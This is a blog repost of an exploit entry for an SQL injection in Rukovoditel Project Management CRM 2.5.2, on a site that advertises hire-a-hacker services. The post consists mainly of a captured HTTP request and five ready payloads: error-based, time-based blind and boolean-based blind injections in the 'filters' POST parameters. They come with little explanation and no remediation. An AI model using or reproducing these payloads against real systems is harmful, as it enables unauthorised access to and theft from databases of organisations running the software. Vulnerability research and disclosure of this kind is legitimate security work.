Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863108380

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection
# Google Dork: N/A
# Date: 2020-01-15
# Blog: https://fatihhcelik.blogspot.com/
# Exploit Author: Fatih Çelik
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://sourceforge.net/projects/rukovoditel/
# Version: 2.5.2
# Tested on: Kali Linux
# CVE : N/A

# Request,

POST /ruko/index.php?module=tools/users_login_log&action=listing HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/ruko/index.php?module=tools/users_login_log
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 125
Connection: close
Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver

page=1&filters%5B0%5D%5Bname%5D=type&filters%5B0%5D%5Bvalue%5D=1&filters%5B1%5D%5Bname%5D=users_id&filters%5B1%5D%5Bvalue%5D=

 
# PAYLOADS,

# Parameter: filters[1][value] (POST)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(6543=6543,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ApLW

# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 1479 FROM (SELECT(SLEEP(5)))WpOr)-- kARm

# Parameter: filters[0][value] (POST)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

Payload: page=1&filters[0][name]=type&filters[0][value]=-6686' OR 4511=4511#&filters[1][name]=users_id&filters[1][value]=1

# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: page=1&filters[0][name]=type&filters[0][value]=0' AND (SELECT 4167 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(4167=4167,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nQyo&filters[1][name]=users_id&filters[1][value]=1

# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: page=1&filters[0][name]=type&filters[0][value]=0' AND (SELECT 6373 FROM (SELECT(SLEEP(5)))ytRS)-- QpIm&filters[1][name]=users_id&filters[1][value]=1